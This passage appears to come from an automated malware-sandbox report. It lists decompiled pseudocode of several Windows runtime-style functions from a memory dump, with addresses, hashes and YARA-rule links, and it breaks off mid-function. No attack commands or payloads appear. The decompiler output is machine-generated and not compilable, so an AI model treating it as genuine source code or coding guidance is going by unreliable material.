                                      • Instruction ID: 7492c1490ee99ae8bb890ddc40c096dc3dec064b7614189c4ea2537ab58a4203
                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                      • Instruction Fuzzy Hash: 5A51C130E04249EFDB24CB69D2E07AEFBB1AF45314F1C81A9D4569F381C376A989C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0379740D, Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E0379740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0371D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0370F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L036E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L036E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0370F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L036E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                      0x0379740d
                                      0x0379740d
                                      0x03797412
                                      0x03797413
                                      0x03797416
                                      0x03797418
                                      0x0379741c
                                      0x0379741f
                                      0x03797422
                                      0x03797422
                                      0x03797428
                                      0x0379742a
                                      0x0379742a
                                      0x03797451
                                      0x03797432
                                      0x0379744f
                                      0x0379744f
                                      0x00000000
                                      0x03797434
                                      0x03797438
                                      0x03797443
                                      0x03797517
                                      0x03797517
                                      0x0379751a
                                      0x03797535
                                      0x03797520
                                      0x03797527
                                      0x0379752c
                                      0x03797531
                                      0x03797533
                                      0x00000000
                                      0x03797533
                                      0x00000000
                                      0x03797531
                                      0x0379754b
                                      0x0379754f
                                      0x0379755c
                                      0x0379755c
                                      0x0379755f
                                      0x03797560
                                      0x03797561
                                      0x03797562
                                      0x03797563
                                      0x03797568
                                      0x0379756a
                                      0x0379756c
                                      0x0379756d
                                      0x0379756d
                                      0x0379756f
                                      0x03797572
                                      0x03797574
                                      0x03797577
                                      0x0379757c
                                      0x0379757f
                                      0x00000000
                                      0x03797551
                                      0x03797551
                                      0x03797551
                                      0x03797553
                                      0x03797553
                                      0x03797449
                                      0x03797449
                                      0x0379744c
                                      0x0379744c
                                      0x00000000
                                      0x0379744c
                                      0x03797443
                                      0x0379750e
                                      0x03797514
                                      0x03797514
                                      0x03797455
                                      0x03797469
                                      0x0379746d
                                      0x00000000
                                      0x03797473
                                      0x03797473
                                      0x03797476
                                      0x03797480
                                      0x03797484
                                      0x0379748e
                                      0x03797493
                                      0x03797493
                                      0x03797496
                                      0x03797499
                                      0x037974a1
                                      0x037974b1
                                      0x037974b5
                                      0x00000000
                                      0x037974bb
                                      0x037974c1
                                      0x037974c1
                                      0x037974c4
                                      0x037974c5
                                      0x037974c6
                                      0x037974c7
                                      0x037974c8
                                      0x037974cd
                                      0x00000000
                                      0x037974d3
                                      0x037974d3
                                      0x037974d6
                                      0x037974d8
                                      0x037974db
                                      0x037974dd
                                      0x037974e0
                                      0x037974e7
                                      0x037974ee
                                      0x037974ee
                                      0x037974f4
                                      0x037974f9
                                      0x00000000
                                      0x037974fb
                                      0x037974fb
                                      0x037974fd
                                      0x03797500
                                      0x03797503
                                      0x03797505
                                      0x03797505
                                      0x037974f9
                                      0x00000000
                                      0x037974cd
                                      0x037974b5
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction ID: 1bc0dd280cf444757073ee717ce659cb845cbfe7237e502c03c1f65487c91c59
                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                      • Instruction Fuzzy Hash: A4517C71600646EFDF19CF14D480A96FBB9FF45304F18C1AAE9089F262E771E946CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F2990, Relevance: .1, Instructions: 133COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E036F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x379ff00);
				E0371D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x36a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0370E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x36a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E037451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x36a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E036F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E036D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E036F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E036F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E036F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E036F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0371D0D1(_t62);
				goto L28;
			}





















                                      0x036f2990
                                      0x036f2992
                                      0x036f2997
                                      0x036f29a3
                                      0x036f29a6
                                      0x036f29ab
                                      0x036f29ad
                                      0x036f29b2
                                      0x03735c80
                                      0x036f29b8
                                      0x036f29b8
                                      0x036f29bb
                                      0x036f29c0
                                      0x036f29c5
                                      0x036f29c6
                                      0x036f29c6
                                      0x036f29cb
                                      0x00000000
                                      0x00000000
                                      0x036f29cd
                                      0x036f29d0
                                      0x036f29d9
                                      0x036f29db
                                      0x036f29dd
                                      0x036f2a7f
                                      0x036f2a84
                                      0x036f2a87
                                      0x036f2a89
                                      0x03735ca1
                                      0x03735ca3
                                      0x00000000
                                      0x036f2a8f
                                      0x036f2a8f
                                      0x00000000
                                      0x036f2a8f
                                      0x00000000
                                      0x036f29e3
                                      0x036f29e3
                                      0x036f29e3
                                      0x00000000
                                      0x036f29e3
                                      0x036f29dd
                                      0x00000000
                                      0x036f29db
                                      0x036f29e6
                                      0x036f29e9
                                      0x036f29eb
                                      0x036f29ed
                                      0x036f29f3
                                      0x036f29f5
                                      0x036f29f8
                                      0x036f29fa
                                      0x036f2a97
                                      0x036f2a9a
                                      0x036f2a9d
                                      0x036f2add
                                      0x00000000
                                      0x036f2a9f
                                      0x036f2aa2
                                      0x036f2aa5
                                      0x036f2aa8
                                      0x036f2aab
                                      0x03735cab
                                      0x03735caf
                                      0x03735cc5
                                      0x03735cda
                                      0x03735cdc
                                      0x03735cdf
                                      0x03735ce5
                                      0x00000000
                                      0x03735ceb
                                      0x03735ced
                                      0x03735cee
                                      0x00000000
                                      0x03735cee
                                      0x03735cb1
                                      0x03735cb4
                                      0x03735cb9
                                      0x03735cbb
                                      0x00000000
                                      0x03735cbd
                                      0x03735cbd
                                      0x00000000
                                      0x03735cbd
                                      0x03735cbb
                                      0x036f2ab1
                                      0x036f2ab1
                                      0x036f2ac4
                                      0x036f2ac6
                                      0x036f2ac6
                                      0x00000000
                                      0x036f2ac6
                                      0x036f2aab
                                      0x00000000
                                      0x036f2a00
                                      0x036f2a09
                                      0x036f2a0e
                                      0x036f2a21
                                      0x036f2a24
                                      0x036f2a35
                                      0x036f2a3a
                                      0x036f2a3d
                                      0x036f2a42
                                      0x036f2a59
                                      0x036f2a59
                                      0x036f2a5c
                                      0x036f2a5f
                                      0x036f2a5f
                                      0x036f29fa
                                      0x036f29f3
                                      0x036f2a64
                                      0x036f2a64
                                      0x036f2a6b
                                      0x036f2a6b
                                      0x036f2a6d
                                      0x036f2a72
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 736bfabc0b13abac302dc6ce8ae123305675a2057df0bc020eb86efc7ecd9d19
                                      • Instruction ID: df4af246d9c7273201a8cd196333188067dfd034a5e43dc4c5f1fdc18a42068c
                                      • Opcode Fuzzy Hash: 736bfabc0b13abac302dc6ce8ae123305675a2057df0bc020eb86efc7ecd9d19
                                      • Instruction Fuzzy Hash: E8517A7990020ADFCF25CF59C990ADEBBB5BF09314F088559EA10AB360C3759952CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F4BAD, Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E036F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x37bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E036CCC50(_t86);
					L11:
					return E0370B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x37b8504
				E036E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0370FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0370B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L036E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E036CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x37b8504
								E036DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E036F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                      0x036f4bad
                                      0x036f4bbf
                                      0x036f4bc2
                                      0x036f4bc6
                                      0x036f4bcd
                                      0x036f4bd9
                                      0x037367fe
                                      0x03736800
                                      0x036f4ccc
                                      0x036f4ccd
                                      0x036f4cb7
                                      0x036f4cc9
                                      0x036f4cc9
                                      0x036f4bdf
                                      0x036f4be5
                                      0x00000000
                                      0x00000000
                                      0x036f4beb
                                      0x036f4bef
                                      0x00000000
                                      0x00000000
                                      0x036f4bf5
                                      0x036f4bf9
                                      0x036f4c06
                                      0x036f4c0b
                                      0x036f4c17
                                      0x036f4c1c
                                      0x036f4c1f
                                      0x036f4c25
                                      0x036f4c33
                                      0x036f4c3d
                                      0x036f4c40
                                      0x036f4c43
                                      0x036f4c47
                                      0x036f4c4d
                                      0x036f4c53
                                      0x036f4c54
                                      0x036f4c55
                                      0x036f4c56
                                      0x036f4c5b
                                      0x036f4c5c
                                      0x036f4c63
                                      0x036f4c6b
                                      0x00000000
                                      0x00000000
                                      0x03736776
                                      0x03736784
                                      0x03736784
                                      0x0373679f
                                      0x037367a7
                                      0x037367af
                                      0x037367ce
                                      0x00000000
                                      0x037367b1
                                      0x037367b7
                                      0x037367b8
                                      0x037367c1
                                      0x037367d3
                                      0x037367d9
                                      0x037367dd
                                      0x036f4c94
                                      0x036f4c94
                                      0x036f4c98
                                      0x036f4c9c
                                      0x036f4ca3
                                      0x037367f4
                                      0x037367f4
                                      0x036f4cb5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036f4cb5
                                      0x036f4c79
                                      0x036f4c7e
                                      0x036f4c89
                                      0x036f4c8b
                                      0x036f4c8f
                                      0x036f4c8f
                                      0x00000000
                                      0x036f4c89
                                      0x037367c3
                                      0x00000000
                                      0x037367c3
                                      0x037367af
                                      0x036f4c73
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bbc23d2866b7411b1ff2b323e5df5039cf53fcce130b15b7a77d5756802ad00
                                      • Instruction ID: 9e7864bb4fd2bd876e8de9f730b92bca7113c89e05f30d2620a551c9ae089e30
                                      • Opcode Fuzzy Hash: 8bbc23d2866b7411b1ff2b323e5df5039cf53fcce130b15b7a77d5756802ad00
                                      • Instruction Fuzzy Hash: 0141A835A01218AFCB21DF65C940FEA77B8EF46710F4500A9E908AF241DB74DE85CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F4D3B, Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E036F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x37bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0370FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x37b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0370B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L036E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E036CCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0370B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0370F380(_t67 + 0xc, 0x36a5138, 0x10) == 0) {
								 *0x37b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E036F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E036F4E70(0x37b86b0, 0x36f5690, 0, 0) != 0) {
					_t46 = E036CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                      0x036f4d3b
                                      0x036f4d4d
                                      0x036f4d53
                                      0x036f4d58
                                      0x036f4d65
                                      0x036f4d6c
                                      0x036f4d71
                                      0x036f4d77
                                      0x036f4d7f
                                      0x036f4d8c
                                      0x036f4d8e
                                      0x036f4dad
                                      0x036f4db0
                                      0x036f4db7
                                      0x036f4db8
                                      0x036f4db9
                                      0x036f4dba
                                      0x036f4dbb
                                      0x036f4dc1
                                      0x036f4dc8
                                      0x036f4dcc
                                      0x036f4dd5
                                      0x036f4dde
                                      0x036f4ddf
                                      0x036f4de0
                                      0x036f4de1
                                      0x036f4de6
                                      0x036f4de7
                                      0x036f4de9
                                      0x036f4df3
                                      0x00000000
                                      0x00000000
                                      0x03736c7c
                                      0x03736c8a
                                      0x03736c8a
                                      0x03736c9d
                                      0x03736ca7
                                      0x03736cac
                                      0x03736cb2
                                      0x03736cb9
                                      0x00000000
                                      0x03736cbf
                                      0x03736cbf
                                      0x00000000
                                      0x03736cbf
                                      0x03736cb9
                                      0x036f4dfb
                                      0x03736ccf
                                      0x03736cd3
                                      0x036f4e32
                                      0x036f4e39
                                      0x03736ce0
                                      0x03736cf2
                                      0x03736cf2
                                      0x03736ce0
                                      0x036f4e3f
                                      0x036f4e41
                                      0x036f4e51
                                      0x036f4e51
                                      0x036f4e03
                                      0x036f4e03
                                      0x036f4e09
                                      0x036f4e0f
                                      0x036f4e57
                                      0x00000000
                                      0x00000000
                                      0x036f4e1b
                                      0x036f4e30
                                      0x036f4e5b
                                      0x036f4e5b
                                      0x00000000
                                      0x036f4e30
                                      0x036f4e11
                                      0x036f4e11
                                      0x036f4e16
                                      0x00000000
                                      0x036f4e16
                                      0x036f4e01
                                      0x00000000
                                      0x036f4e01
                                      0x036f4da5
                                      0x03736c6b
                                      0x00000000
                                      0x036f4dab
                                      0x036f4dab
                                      0x00000000
                                      0x036f4dab

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b225514ac982c8034cb0844650d22ea370d7364af43c9d7b9dcf1554a9cb5c78
                                      • Instruction ID: d987703d191314af68aa706fc0601bf701e4dee543a0214cb88f663037b47c98
                                      • Opcode Fuzzy Hash: b225514ac982c8034cb0844650d22ea370d7364af43c9d7b9dcf1554a9cb5c78
                                      • Instruction Fuzzy Hash: D2411275A00318AFEB32DF25CC80FABB7A9EF45614F0400A9EA459B681DB74ED44CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D8A0A, Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E036D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x37bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0370B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E036DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x36a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E036F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03703C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
